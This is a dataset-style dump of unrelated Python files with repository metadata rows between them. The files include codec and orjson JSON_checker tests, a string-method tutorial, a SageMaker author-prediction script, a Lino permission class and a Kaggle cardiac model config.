                if csetval <= 0x7F:
                    csetch = bytes([csetval & 0xff])
                elif csetval >= 0x1000000:
                    csetch = bytes([(csetval >> 24), ((csetval >> 16) & 0xff),
                                    ((csetval >> 8) & 0xff), (csetval & 0xff)])
                elif csetval >= 0x10000:
                    csetch = bytes([(csetval >> 16), ((csetval >> 8) & 0xff),
                                    (csetval & 0xff)])
                elif csetval >= 0x100:
                    csetch = bytes([(csetval >> 8), (csetval & 0xff)])
                else:
                    continue
                unich = unichrs(data[1])
                # Skip replacement-character entries and duplicates.
                if ord(unich) == 0xfffd or unich in urt_wa:
                    continue
                urt_wa[unich] = csetch
                self._testpoint(csetch, unich)
    def _test_mapping_file_ucm(self):
        """Parse <a u="XXXX" b=".."/> entries from a ucm/xml table."""
        with self.open_mapping_file() as f:
            ucmdata = f.read()
        uc = re.findall('<a u="([A-F0-9]{4})" b="([0-9A-F ]+)"/>', ucmdata)
        for uni, coded in uc:
            unich = chr(int(uni, 16))
            codech = bytes(int(c, 16) for c in coded.split())
            self._testpoint(codech, unich)
    def test_mapping_supplemental(self):
        """Check the subclass-provided extra mapping pairs."""
        for mapping in self.supmaps:
            self._testpoint(*mapping)
    def _testpoint(self, csetch, unich):
        """Assert encode and decode agree for one (bytes, char) pair."""
        if (csetch, unich) not in self.pass_enctest:
            self.assertEqual(unich.encode(self.encoding), csetch)
        if (csetch, unich) not in self.pass_dectest:
            self.assertEqual(str(csetch, self.encoding), unich)
    def test_errorhandle(self):
        """Run the per-codec (input, errors-scheme, expected) table."""
        for source, scheme, expected in self.codectests:
            if isinstance(source, bytes):
                func = source.decode
            else:
                func = source.encode
            if expected:
                if isinstance(source, bytes):
                    result = func(self.encoding, scheme)
                    self.assertTrue(type(result) is str, type(result))
                    self.assertEqual(result, expected,
                                     '%a.decode(%r, %r)=%a != %a'
                                     % (source, self.encoding, scheme, result,
                                        expected))
                else:
                    result = func(self.encoding, scheme)
                    self.assertTrue(type(result) is bytes, type(result))
                    self.assertEqual(result, expected,
                                     '%a.encode(%r, %r)=%a != %a'
                                     % (source, self.encoding, scheme, result,
                                        expected))
            else:
                self.assertRaises(UnicodeError, func, self.encoding, scheme)
def load_teststring(name):
    """Return (native_bytes, utf8_bytes) for the named cjkencodings fixture.

    Both files live in the 'cjkencodings' directory next to this module:
    '<name>.txt' holds the natively-encoded text, '<name>-utf8.txt' the
    same text re-encoded as UTF-8.
    """
    fixture_dir = os.path.join(os.path.dirname(__file__), 'cjkencodings')
    def _read_bytes(filename):
        with open(os.path.join(fixture_dir, filename), 'rb') as fp:
            return fp.read()
    return _read_bytes(name + '.txt'), _read_bytes(name + '-utf8.txt')
| [
"15173342800@163.com"
] | 15173342800@163.com |
7e49268cc95f7618ee769890ed82c3ea558465c2 | c15a2b234376b3a8ea5f3c790b4afd47150dcfcc | /Libs_Modules/test_3.py | b843063ce4cb8f089f79f6cafc5b1330a6760613 | [] | no_license | GLMF/GLMF225 | 9c05b60d8bce71973460e2d98c454b22115b92fc | c83e506f522af89cff1c76286689bb5cf2f412cf | refs/heads/master | 2020-05-03T20:48:00.897857 | 2019-04-01T07:41:13 | 2019-04-01T07:41:13 | 178,810,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 611 | py | from PyInquirer import prompt
widget = [
{
'type': 'expand',
'name': 'serie',
'message': 'Quelle est votre série préférée ?',
'choices': [
{
'key': 'g',
'name': 'Game of Thrones',
'value': 'GoT'
},
{
'key': 'l',
'name': 'Lucifer',
'value': 'lucifer'
},
{
'key': 'w',
'name': 'Westworld',
'value': 'westworld'
}
]
}
]
result = prompt(widget)
| [
"tristan.colombo@gmail.com"
] | tristan.colombo@gmail.com |
3dd3ad42d05707545bad918cdf8e1c1a1956688b | 8e24e8bba2dd476f9fe612226d24891ef81429b7 | /geeksforgeeks/python/basic/3_2.py | 1a6ecef30016ab772e487b8b0093ba0f863bafe3 | [] | no_license | qmnguyenw/python_py4e | fb56c6dc91c49149031a11ca52c9037dc80d5dcf | 84f37412bd43a3b357a17df9ff8811eba16bba6e | refs/heads/master | 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,003 | py | Difference between str.capitalize() VS str.title()
Both **title()** and **capitalize()** have similar functionality of
capitalizing first characters. Let us see the difference between the two of
them.
### title()
**title()** function in Python is the Python String Method which is used to
convert the first character in each word to Uppercase and remaining characters
to Lowercase in the string and returns a new string.
> **Syntax:** str.title()
>
> **Parameters:** None
>
> **Returns:** This function returns a string which has first letter in each
> word is uppercase and all remaining letters are lowercase.
>
>
>
>
>
>
**Example:**
## Python3
__
__
__
__
__
__
__
# Python Title() Method Example
str1 = 'geeKs foR geEks'
str2 = str1.title()
print ('First Output after Title() method is = ', str2)
# observe the original string
print ('Converted String is = ', str1.title())
print ('Original String is = ', str1 )
# Performing title() function directly
str3 = 'ASIPU pawan kuMAr'.title()
print ('Second Output after Title() method is = ', str3)
str4 = 'stutya kUMari sHAW'.title()
print ('Third Output after Title() method is = ', str4)
str5 = '6041'.title()
print ('Fourth Output after Title() method is = ', str5)
---
__
__
**Output:**
First Output after Title() method is = Geeks For Geeks
Converted String is = Geeks For Geeks
Original String is = geeKs foR geEks
Second Output after Title() method is = Asipu Pawan Kumar
Third Output after Title() method is = Stutya Kumari Shaw
Fourth Output after Title() method is = 6041
### capitalize()
In Python, the **capitalize()** method converts the first character of a
string to a capital **(uppercase)** letter and every remaining character to
lowercase. If the string is already in that form, it is returned unchanged.
> **Syntax:** str.capitalize()
> **Parameters:** None
>
> **Returns:** This function returns a string which has the first letter in
> uppercase and all remaining letters in lowercase.
**Example:**
## Python3
__
__
__
__
__
__
__
# Python program to demonstrate the
# use of capitalize() function
# capitalize() first letter of
# string.
name = "geeks for geeks"
print(name.capitalize())
# demonstration of individual words
# capitalization to generate camel case
name1 = "geeks"
name2 = "for"
name3 = "geeks"
print(name1.capitalize() + name2.capitalize()
+ name3.capitalize())
---
__
__
**Output:**
Geeks for geeks
GeeksForGeeks
### Difference Between title() and capitalize()
The difference between them is that Python string method title() returns a
copy of the string in which the first characters of all the words are
capitalized whereas the string method capitalize() returns a copy of the
string in which just the first word of the entire string is capitalized.
**Example:**
str = "geeks for geeks"
str.title() will return Geeks For Geeks
str.capitalize() will return Geeks for geeks
## Python3
__
__
__
__
__
__
__
str1= "my name is xyz"
str2 = "geeks for geeks"
# using title()
print(str1.title())
print(str2.title())
# using capitalize()
print(str1.capitalize())
print(str2.capitalize())
---
__
__
**Output:**
My Name Is Xyz
Geeks For Geeks
My name is xyz
Geeks for geeks
Attention geek! Strengthen your foundations with the **Python Programming
Foundation** Course and learn the basics.
To begin with, your interview preparations Enhance your Data Structures
concepts with the **Python DS** Course.
My Personal Notes _arrow_drop_up_
Save
| [
"qmnguyenw@gmail.com"
] | qmnguyenw@gmail.com |
1d664ef000866e3f35691cf6c589f02e172914c7 | 77d3633bb64d585aa087677af9ca6f672ae9ff1f | /src/sagemaker/serve/predict_nlp.py | a854a3c9b662a2a26b489283e45b4dead44b083c | [
"MIT"
] | permissive | reneang17/authorencoder | 0f16d9d2c72db3bd3e50fac03b7eb6e25e6f7f75 | e607ddc77d18fc62e292adfe1595a5dd35e10f99 | refs/heads/master | 2022-07-15T01:23:28.450030 | 2020-03-03T05:10:15 | 2020-03-03T05:10:15 | 237,246,389 | 2 | 0 | MIT | 2020-03-08T01:37:00 | 2020-01-30T15:46:16 | Jupyter Notebook | UTF-8 | Python | false | false | 3,887 | py | import argparse
import json
import os
import pickle
import sys
import sagemaker_containers
import pandas as pd
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils.data
import numpy
from utils_nlp import tokenize, emb
from models import CNN
from sklearn.neighbors import KNeighborsClassifier as KNC
def model_fn(model_dir):
"""Load the PyTorch model from the `model_dir` directory."""
print("Loading model.")
# First, load the parameters used to create the model.
model_info = {}
model_info_path = os.path.join(model_dir, 'model_info.pth')
with open(model_info_path, 'rb') as f:
model_info = torch.load(f)
print("model_info: {}".format(model_info))
# Determine the device and construct the model.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
#**********************************
# Load model
INPUT_DIM = model_info['INPUT_DIM']
WORD_EMBEDDING_DIM = model_info['WORD_EMBEDDING_DIM']
N_FILTERS = model_info['N_FILTERS']
FILTER_SIZES = model_info['FILTER_SIZES']
AUTHOR_DIM = model_info['AUTHOR_DIM']
DROPOUT = model_info['DROPOUT']
PAD_IDX = model_info['PAD_IDX']
#UNK_IDX = 0
model = CNN(INPUT_DIM, WORD_EMBEDDING_DIM, N_FILTERS, FILTER_SIZES, AUTHOR_DIM, DROPOUT, PAD_IDX)
print("Model loaded with embedding_dim {}, vocab_size {}.".format(
# args.embedding_dim, args.hidden_dim, args.vocab_size
WORD_EMBEDDING_DIM, INPUT_DIM))
#**********************************
# Load the stored model parameters.
model_path = os.path.join(model_dir, 'model_state.pt')
with open(model_path, 'rb') as f:
model.load_state_dict(torch.load(f))
# Load the saved word_dict.
word_dict_path = os.path.join(model_dir, 'word_dict.pkl')
with open(word_dict_path, 'rb') as f:
model.word_dict = pickle.load(f)
model.to(device).eval()
print("Done loading model.")
return model
def input_fn(serialized_input_data, content_type):
print('Deserializing the input data.')
if content_type == 'text/plain':
data = serialized_input_data.decode('utf-8')
return data
raise Exception('Requested unsupported ContentType in content_type: ' + content_type)
def output_fn(prediction_output, accept):
print('Serializing the generated output.')
return str(prediction_output)
#import training data and form clusters
#author_encoder_path = os.path.join('./', 'authorencoder.pkl')
#with open(author_encoder_path, 'rb') as f:
# train_embeddings_otl, train_labels_otl= pickle.load( f )
train_embeddings_otl, train_labels_otl = emb()
from sklearn.neighbors import KNeighborsClassifier as KNC
KNN = KNC(n_neighbors=3)
KNN.fit(train_embeddings_otl, train_labels_otl)
def predict_fn(input_text, model):
print('Inferring sentiment of input data.')
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
if model.word_dict is None:
raise Exception('Model has not been loaded properly, no word_dict.')
model = model
word_dict = model.word_dict
tokenized = tokenize(word_dict, input_text)
tensor = torch.tensor(tokenized).to(device)
tensor = tensor.unsqueeze(0).unsqueeze(0)
# Make sure to put the model into evaluation mode
model.eval()
#raise Exception('This is the input: ' + tensor)
with torch.no_grad():
output = model.forward(tensor).tolist()
prediction = int(KNN.predict(output).item())
author_dir = {0: 'John Dryden', 1: 'Robert Pinsky', 2: 'Anne Carson', 3: 'Alfred Lord Tennyson', 4: 'Allen Ginsberg', 5: 'Philip Whalen', 6: 'Matthew Arnold', 7: 'Walt Whitman', 8: 'William Shakespeare', 9: 'Beowulf Anonimous'}
return author_dir[prediction]
| [
"reneang17@gmail.com"
] | reneang17@gmail.com |
e41bf4c1770b7508b7f425ca2d18b7d1d68dad13 | 89e3f694021f261b95e494d2b479367bacde8251 | /tests/types/test_entity.py | 2910ad18598425b5e693e0e5e7401820c5e9b731 | [
"MIT"
] | permissive | dchaplinsky/followthemoney | 6f9c05f430f8bfb04f7841378fd2ee5cf9b33235 | a2a150f558acb5a1c985b9dc891c98c0fdf2f17e | refs/heads/master | 2020-09-10T08:16:14.617602 | 2019-11-14T09:15:52 | 2019-11-14T09:15:52 | 221,699,199 | 1 | 0 | MIT | 2019-11-14T13:03:41 | 2019-11-14T13:03:41 | null | UTF-8 | Python | false | false | 790 | py | import unittest
from followthemoney.types import registry
entities = registry.entity
class EntityTest(unittest.TestCase):
def test_parse(self):
self.assertEqual(entities.clean('88'), '88')
self.assertEqual(entities.clean(88), '88')
self.assertEqual(entities.clean({'id': 88}), '88')
self.assertEqual(entities.clean(None), None)
self.assertEqual(entities.clean('With spaces'), None)
self.assertEqual(entities.clean('With!special'), None)
self.assertEqual(entities.clean('with.dot'), 'with.dot')
def test_normalize(self):
self.assertEqual(entities.normalize('FOO'), ['FOO'])
self.assertEqual(entities.normalize(None), [])
def test_funcs(self):
self.assertEqual(entities.specificity('bla'), 1)
| [
"friedrich@pudo.org"
] | friedrich@pudo.org |
bd592c205d08a1f8ddc82451cb09b38db2934de7 | a4deea660ea0616f3b5ee0b8bded03373c5bbfa2 | /concrete_instances/register-variants/vfmsubadd213ps_xmm_xmm_xmm/instructions/vfmsubadd213ps_xmm_xmm_xmm/vfmsubadd213ps_xmm_xmm_xmm.gen.vex.py | 47e6123f37d250678ee38d0e8009fe13fcb34be4 | [] | no_license | Vsevolod-Livinskij/x86-64-instruction-summary | 4a43472e26f0e4ec130be9a82f7e3f3c1361ccfd | c276edab1b19e3929efb3ebe7514489f66087764 | refs/heads/master | 2022-02-02T18:11:07.818345 | 2019-01-25T17:19:21 | 2019-01-25T17:19:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 210 | py | import angr
proj = angr.Project('./instructions/vfmsubadd213ps_xmm_xmm_xmm/vfmsubadd213ps_xmm_xmm_xmm.o')
print proj.arch
print proj.entry
print proj.filename
irsb = proj.factory.block(proj.entry).vex
irsb.pp() | [
"sdasgup3@illinois.edu"
] | sdasgup3@illinois.edu |
0fc748c3389c508b98a2f8ce1f12b4fb2ed423d3 | f213549d8725acaf5417d0d5290430d499bf3cf3 | /lino/core/boundaction.py | b3a6a42f40bb013688e5fa75400c13ca08ccbe41 | [
"BSD-2-Clause"
] | permissive | ExcellentServ/lino | 56c8159428a451058a35dad75e8799d239c2dc0e | 9ea630e719d47843dd8427dd64db22633626fd3d | refs/heads/master | 2020-12-28T23:15:47.380120 | 2015-01-27T14:53:10 | 2015-01-27T14:53:10 | 29,911,723 | 0 | 0 | null | 2015-01-27T11:44:09 | 2015-01-27T11:44:08 | null | UTF-8 | Python | false | false | 3,744 | py | # -*- coding: UTF-8 -*-
# Copyright 2009-2015 Luc Saffre
# License: BSD (see file COPYING for details)
"""
.. autosummary::
"""
import logging
logger = logging.getLogger(__name__)
from django.conf import settings
from lino.utils import curry
from lino.core import actions
class BoundAction(object):
"""An Action which is bound to an Actor. If an Actor has subclasses,
each subclass "inherits" its actions.
"""
def __init__(self, actor, action):
if not isinstance(action, actions.Action):
raise Exception("%s : %r is not an Action" % (actor, action))
self.action = action
self.actor = actor
required = dict()
if action.readonly:
required.update(actor.required)
#~ elif isinstance(action,InsertRow):
#~ required.update(actor.create_required)
elif isinstance(action, actions.DeleteSelected):
required.update(actor.delete_required)
else:
required.update(actor.update_required)
required.update(action.required)
#~ print 20120628, str(a), required
#~ def wrap(a,required,fn):
#~ return fn
debug_permissions = actor.debug_permissions and \
action.debug_permissions
if debug_permissions:
if settings.DEBUG:
logger.info("debug_permissions active for %r (required=%s)",
self, required)
else:
raise Exception(
"settings.DEBUG is False, but `debug_permissions` "
"for %r (required=%s) is active." % (self, required))
from lino.modlib.users.utils import (
make_permission_handler, make_view_permission_handler)
self.allow_view = curry(make_view_permission_handler(
self, action.readonly, debug_permissions, **required), action)
self._allow = curry(make_permission_handler(
action, actor, action.readonly,
debug_permissions, **required), action)
#~ if debug_permissions:
#~ logger.info("20130424 _allow is %s",self._allow)
#~ actor.actions.define(a.action_name,ba)
def get_window_layout(self):
return self.action.get_window_layout(self.actor)
def get_window_size(self):
return self.action.get_window_size(self.actor)
def full_name(self):
return self.action.full_name(self.actor)
def request(self, *args, **kw):
kw.update(action=self)
return self.actor.request(*args, **kw)
def get_button_label(self, *args):
return self.action.get_button_label(self.actor, *args)
#~ def get_panel_btn_handler(self,*args):
#~ return self.action.get_panel_btn_handler(self.actor,*args)
def setup_action_request(self, *args):
return self.action.setup_action_request(self.actor, *args)
def get_row_permission(self, ar, obj, state):
#~ if self.actor is None: return False
return self.actor.get_row_permission(obj, ar, state, self)
def get_bound_action_permission(self, ar, obj, state):
if not self.action.get_action_permission(ar, obj, state):
return False
return self._allow(ar.get_user(), obj, state)
def get_view_permission(self, profile):
"""
Return True if this bound action is visible for users of this
profile.
"""
if not self.actor.get_view_permission(profile):
return False
if not self.action.get_view_permission(profile):
return False
return self.allow_view(profile)
def __repr__(self):
return "<%s(%s,%r)>" % (
self.__class__.__name__, self.actor, self.action)
| [
"luc.saffre@gmail.com"
] | luc.saffre@gmail.com |
7b5fe80b8b6972477471881efb10fa5a505144d9 | bfc25f1ad7bfe061b57cfab82aba9d0af1453491 | /data/external/repositories_2to3/267667/kaggle-heart-master/configurations/je_os_fixedaggr_joniscale80small_augzoombright.py | 9b93b720a6e67660825c575404d24f2b139a2e03 | [
"MIT"
] | permissive | Keesiu/meta-kaggle | 77d134620ebce530d183467202cf45639d9c6ff2 | 87de739aba2399fd31072ee81b391f9b7a63f540 | refs/heads/master | 2020-03-28T00:23:10.584151 | 2018-12-20T19:09:50 | 2018-12-20T19:09:50 | 147,406,338 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,771 | py | """Single slice vgg with normalised scale.
"""
import functools
import lasagne as nn
import numpy as np
import theano
import theano.tensor as T
import data_loader
import deep_learning_layers
import image_transform
import layers
import preprocess
import postprocess
import objectives
import theano_printer
import updates
import utils
# Random params
rng = np.random
take_a_dump = False # dump a lot of data in a pkl-dump file. (for debugging)
dump_network_loaded_data = False # dump the outputs from the dataloader (for debugging)
# Memory usage scheme
caching = None
# Save and validation frequency
validate_every = 20
validate_train_set = True
save_every = 20
restart_from_save = False
dump_network_loaded_data = False
# Training (schedule) parameters
# - batch sizes
batch_size = 8
sunny_batch_size = 4
batches_per_chunk = 16
num_epochs_train = 400
# - learning rate and method
base_lr = 0.0001
learning_rate_schedule = {
0: base_lr,
9*num_epochs_train/10: base_lr/10,
}
momentum = 0.9
build_updates = updates.build_adam_updates
# Preprocessing stuff
cleaning_processes = [
preprocess.set_upside_up,]
cleaning_processes_post = [
functools.partial(preprocess.normalize_contrast_zmuv, z=2)]
augmentation_params = {
"rotation": (-180, 180),
"shear": (0, 0),
"translation": (-8, 8),
"flip_vert": (0, 1),
"roll_time": (0, 0),
"flip_time": (0, 0),
"zoom_x": (.75, 1.25),
"zoom_y": (.75, 1.25),
"change_brightness": (-0.3, 0.3),
}
augmentation_params_test = {
"rotation": (-180, 180),
"shear": (0, 0),
"translation": (-8, 8),
"flip_vert": (0, 1),
"roll_time": (0, 0),
"flip_time": (0, 0),
"zoom_x": (.80, 1.20),
"zoom_y": (.80, 1.20),
"change_brightness": (-0.2, 0.2),
}
use_hough_roi = True
preprocess_train = functools.partial( # normscale_resize_and_augment has a bug
preprocess.preprocess_normscale,
normscale_resize_and_augment_function=functools.partial(
image_transform.normscale_resize_and_augment_2,
normalised_patch_size=(80,80)))
preprocess_validation = functools.partial(preprocess_train, augment=False)
preprocess_test = preprocess_train
sunny_preprocess_train = preprocess.sunny_preprocess_with_augmentation
sunny_preprocess_validation = preprocess.sunny_preprocess_validation
sunny_preprocess_test = preprocess.sunny_preprocess_validation
# Data generators
create_train_gen = data_loader.generate_train_batch
create_eval_valid_gen = functools.partial(data_loader.generate_validation_batch, set="validation")
create_eval_train_gen = functools.partial(data_loader.generate_validation_batch, set="train")
create_test_gen = functools.partial(data_loader.generate_test_batch, set=["validation", "test"])
def filter_samples(folders):
# don't use patients who don't have mre than 6 slices
return [
folder for folder in folders
if data_loader.compute_nr_slices(folder) > 6]
# Input sizes
image_size = 64
nr_slices = 20
data_sizes = {
"sliced:data:sax": (batch_size, nr_slices, 30, image_size, image_size),
"sliced:data:sax:locations": (batch_size, nr_slices),
"sliced:data:sax:is_not_padded": (batch_size, nr_slices),
"sliced:data:randomslices": (batch_size, nr_slices, 30, image_size, image_size),
"sliced:data:singleslice:difference:middle": (batch_size, 29, image_size, image_size),
"sliced:data:singleslice:difference": (batch_size, 29, image_size, image_size),
"sliced:data:singleslice": (batch_size, 30, image_size, image_size),
"sliced:data:ax": (batch_size, 30, 15, image_size, image_size),
"sliced:data:shape": (batch_size, 2,),
"sunny": (sunny_batch_size, 1, image_size, image_size)
# TBC with the metadata
}
# Objective
l2_weight = 0.000
l2_weight_out = 0.000
def build_objective(interface_layers):
# l2 regu on certain layers
l2_penalty = nn.regularization.regularize_layer_params_weighted(
interface_layers["regularizable"], nn.regularization.l2)
# build objective
return objectives.KaggleObjective(interface_layers["outputs"], penalty=l2_penalty)
# Testing
postprocess = postprocess.postprocess
test_time_augmentations = 100 # More augmentations since a we only use single slices
#tta_average_method = lambda x: np.cumsum(utils.norm_geometric_average(utils.cdf_to_pdf(x)))
# nonlinearity putting a lower bound on it's output
def lb_softplus(lb):
return lambda x: nn.nonlinearities.softplus(x) + lb
init = nn.init.Orthogonal()
rnn_layer = functools.partial(nn.layers.RecurrentLayer,
W_in_to_hid=init,
W_hid_to_hid=init,
b=nn.init.Constant(0.1),
nonlinearity=nn.nonlinearities.rectify,
hid_init=nn.init.Constant(0.),
backwards=False,
learn_init=True,
gradient_steps=-1,
grad_clipping=False,
unroll_scan=False,
precompute_input=False)
# Architecture
def build_model():
#################
# Regular model #
#################
input_size = data_sizes["sliced:data:sax"]
input_size_mask = data_sizes["sliced:data:sax:is_not_padded"]
input_size_locations = data_sizes["sliced:data:sax:locations"]
l0 = nn.layers.InputLayer(input_size)
lin_slice_mask = nn.layers.InputLayer(input_size_mask)
lin_slice_locations = nn.layers.InputLayer(input_size_locations)
# PREPROCESS SLICES SEPERATELY
# Convolutional layers and some dense layers are defined in a submodel
l0_slices = nn.layers.ReshapeLayer(l0, (-1, [2], [3], [4]))
from . import je_ss_jonisc80small_360_gauss_longer_augzoombright
submodel = je_ss_jonisc80small_360_gauss_longer_augzoombright.build_model(l0_slices)
# Systole Dense layers
l_sys_mu = submodel["meta_outputs"]["systole:mu"]
l_sys_sigma = submodel["meta_outputs"]["systole:sigma"]
# Diastole Dense layers
l_dia_mu = submodel["meta_outputs"]["diastole:mu"]
l_dia_sigma = submodel["meta_outputs"]["diastole:sigma"]
# AGGREGATE SLICES PER PATIENT
l_scaled_slice_locations = layers.TrainableScaleLayer(lin_slice_locations, scale=nn.init.Constant(0.1), trainable=False)
# Systole
l_pat_sys_ss_mu = nn.layers.ReshapeLayer(l_sys_mu, (-1, nr_slices))
l_pat_sys_ss_sigma = nn.layers.ReshapeLayer(l_sys_sigma, (-1, nr_slices))
l_pat_sys_aggr_mu_sigma = layers.JeroenLayer([l_pat_sys_ss_mu, l_pat_sys_ss_sigma, lin_slice_mask, l_scaled_slice_locations], rescale_input=100.)
l_systole = layers.MuSigmaErfLayer(l_pat_sys_aggr_mu_sigma)
# Diastole
l_pat_dia_ss_mu = nn.layers.ReshapeLayer(l_dia_mu, (-1, nr_slices))
l_pat_dia_ss_sigma = nn.layers.ReshapeLayer(l_dia_sigma, (-1, nr_slices))
l_pat_dia_aggr_mu_sigma = layers.JeroenLayer([l_pat_dia_ss_mu, l_pat_dia_ss_sigma, lin_slice_mask, l_scaled_slice_locations], rescale_input=100.)
l_diastole = layers.MuSigmaErfLayer(l_pat_dia_aggr_mu_sigma)
submodels = [submodel]
return {
"inputs":{
"sliced:data:sax": l0,
"sliced:data:sax:is_not_padded": lin_slice_mask,
"sliced:data:sax:locations": lin_slice_locations,
},
"outputs": {
"systole": l_systole,
"diastole": l_diastole,
},
"regularizable": dict(
{},
**{
k: v
for d in [model["regularizable"] for model in submodels if "regularizable" in model]
for k, v in list(d.items()) }
),
# "pretrained":{
# je_ss_jonisc80small_360_gauss_longer_augzoombright.__name__: submodel["outputs"],
# }
}
| [
"keesiu.wong@gmail.com"
] | keesiu.wong@gmail.com |
2954c7bb5b4630407209831dc851c067c8f7488a | b445f7ba5ae4899c3782dc08627b778de6bbf12b | /test/test_jsonchecker.py | 88703e6457bdd1c1e3214667c699e8b5be6bb428 | [
"Apache-2.0",
"MIT"
] | permissive | ijl/orjson | 91e620f1e68e985064a68e77569b56ff378637ea | d1cd27e29c8df2768be016071d0800a92d120786 | refs/heads/master | 2023-08-31T05:10:58.385975 | 2023-08-29T12:29:42 | 2023-08-29T13:05:57 | 158,618,772 | 4,895 | 243 | Apache-2.0 | 2023-09-08T00:40:34 | 2018-11-21T23:43:14 | Python | UTF-8 | Python | false | false | 6,187 | py | # SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
Tests files from http://json.org/JSON_checker/
"""
import pytest
import orjson
from .util import read_fixture_str
PATTERN_1 = '["JSON Test Pattern pass1",{"object with 1 member":["array with 1 element"]},{},[],-42,true,false,null,{"integer":1234567890,"real":-9876.54321,"e":1.23456789e-13,"E":1.23456789e34,"":2.3456789012e76,"zero":0,"one":1,"space":" ","quote":"\\"","backslash":"\\\\","controls":"\\b\\f\\n\\r\\t","slash":"/ & /","alpha":"abcdefghijklmnopqrstuvwyz","ALPHA":"ABCDEFGHIJKLMNOPQRSTUVWYZ","digit":"0123456789","0123456789":"digit","special":"`1~!@#$%^&*()_+-={\':[,]}|;.</>?","hex":"ģ䕧覫췯ꯍ\uef4a","true":true,"false":false,"null":null,"array":[],"object":{},"address":"50 St. James Street","url":"http://www.JSON.org/","comment":"// /* <!-- --","# -- --> */":" "," s p a c e d ":[1,2,3,4,5,6,7],"compact":[1,2,3,4,5,6,7],"jsontext":"{\\"object with 1 member\\":[\\"array with 1 element\\"]}","quotes":"" \\" %22 0x22 034 "","/\\\\\\"쫾몾ꮘﳞ볚\uef4a\\b\\f\\n\\r\\t`1~!@#$%^&*()_+-=[]{}|;:\',./<>?":"A key can be any string"},0.5,98.6,99.44,1066,10.0,1.0,0.1,1.0,2.0,2.0,"rosebud"]'.encode()
class TestJsonChecker:
def _run_fail_json(self, filename, exc=orjson.JSONDecodeError):
data = read_fixture_str(filename, "jsonchecker")
pytest.raises(exc, orjson.loads, data)
def _run_pass_json(self, filename, match=""):
data = read_fixture_str(filename, "jsonchecker")
assert orjson.dumps(orjson.loads(data)) == match
def test_fail01(self):
"""
fail01.json
"""
self._run_pass_json(
"fail01.json",
b'"A JSON payload should be an object or array, not a string."',
)
def test_fail02(self):
"""
fail02.json
"""
self._run_fail_json("fail02.json", orjson.JSONDecodeError) # EOF
def test_fail03(self):
"""
fail03.json
"""
self._run_fail_json("fail03.json")
def test_fail04(self):
"""
fail04.json
"""
self._run_fail_json("fail04.json")
def test_fail05(self):
"""
fail05.json
"""
self._run_fail_json("fail05.json")
def test_fail06(self):
"""
fail06.json
"""
self._run_fail_json("fail06.json")
def test_fail07(self):
"""
fail07.json
"""
self._run_fail_json("fail07.json")
def test_fail08(self):
"""
fail08.json
"""
self._run_fail_json("fail08.json")
def test_fail09(self):
"""
fail09.json
"""
self._run_fail_json("fail09.json")
def test_fail10(self):
"""
fail10.json
"""
self._run_fail_json("fail10.json")
def test_fail11(self):
"""
fail11.json
"""
self._run_fail_json("fail11.json")
def test_fail12(self):
"""
fail12.json
"""
self._run_fail_json("fail12.json")
def test_fail13(self):
"""
fail13.json
"""
self._run_fail_json("fail13.json")
def test_fail14(self):
"""
fail14.json
"""
self._run_fail_json("fail14.json")
def test_fail15(self):
"""
fail15.json
"""
self._run_fail_json("fail15.json")
def test_fail16(self):
"""
fail16.json
"""
self._run_fail_json("fail16.json")
def test_fail17(self):
"""
fail17.json
"""
self._run_fail_json("fail17.json")
def test_fail18(self):
"""
fail18.json
"""
self._run_pass_json(
"fail18.json", b'[[[[[[[[[[[[[[[[[[[["Too deep"]]]]]]]]]]]]]]]]]]]]'
)
def test_fail19(self):
"""
fail19.json
"""
self._run_fail_json("fail19.json")
def test_fail20(self):
"""
fail20.json
"""
self._run_fail_json("fail20.json")
def test_fail21(self):
"""
fail21.json
"""
self._run_fail_json("fail21.json")
def test_fail22(self):
"""
fail22.json
"""
self._run_fail_json("fail22.json")
def test_fail23(self):
"""
fail23.json
"""
self._run_fail_json("fail23.json")
def test_fail24(self):
"""
fail24.json
"""
self._run_fail_json("fail24.json")
def test_fail25(self):
"""
fail25.json
"""
self._run_fail_json("fail25.json")
def test_fail26(self):
"""
fail26.json
"""
self._run_fail_json("fail26.json")
def test_fail27(self):
"""
fail27.json
"""
self._run_fail_json("fail27.json")
def test_fail28(self):
"""
fail28.json
"""
self._run_fail_json("fail28.json")
def test_fail29(self):
"""
fail29.json
"""
self._run_fail_json("fail29.json")
def test_fail30(self):
"""
fail30.json
"""
self._run_fail_json("fail30.json")
def test_fail31(self):
"""
fail31.json
"""
self._run_fail_json("fail31.json")
def test_fail32(self):
"""
fail32.json
"""
self._run_fail_json("fail32.json", orjson.JSONDecodeError) # EOF
def test_fail33(self):
"""
fail33.json
"""
self._run_fail_json("fail33.json")
def test_pass01(self):
"""
pass01.json
"""
self._run_pass_json("pass01.json", PATTERN_1)
def test_pass02(self):
"""
pass02.json
"""
self._run_pass_json(
"pass02.json", b'[[[[[[[[[[[[[[[[[[["Not too deep"]]]]]]]]]]]]]]]]]]]'
)
def test_pass03(self):
"""
pass03.json
"""
self._run_pass_json(
"pass03.json",
b'{"JSON Test Pattern pass3":{"The outermost value":"must be '
b'an object or array.","In this test":"It is an object."}}',
)
| [
"ijl@mailbox.org"
] | ijl@mailbox.org |
e71a1663ae44c868dbd627ad3114ac41adc06bc0 | b99195cf2d181dec5c31aa7e58d747f474153802 | /Dictionary/Built-in Functions with Dictionary.py | cbca42c09ab3385fa84cac09cd510faf64f700a9 | [] | no_license | eldadpuzach/MyPythonProjects | b1b4d56a822fd781c7c4c7a9e4bb5408c180c187 | 3a961a7c265caf1369067d98e94564f01f1bde74 | refs/heads/master | 2020-03-20T18:07:43.319331 | 2019-02-13T22:07:10 | 2019-02-13T22:07:10 | 137,570,971 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 598 | py | # Built-in Functions with Dictionary
#
# Built-in functions like all(), any(), len(), cmp(), sorted() etc. are commonly used with dictionary to perform different tasks.
# Built-in Functions with Dictionary Function Description
# all() Return True if all keys of the dictionary are true (or if the dictionary is empty).
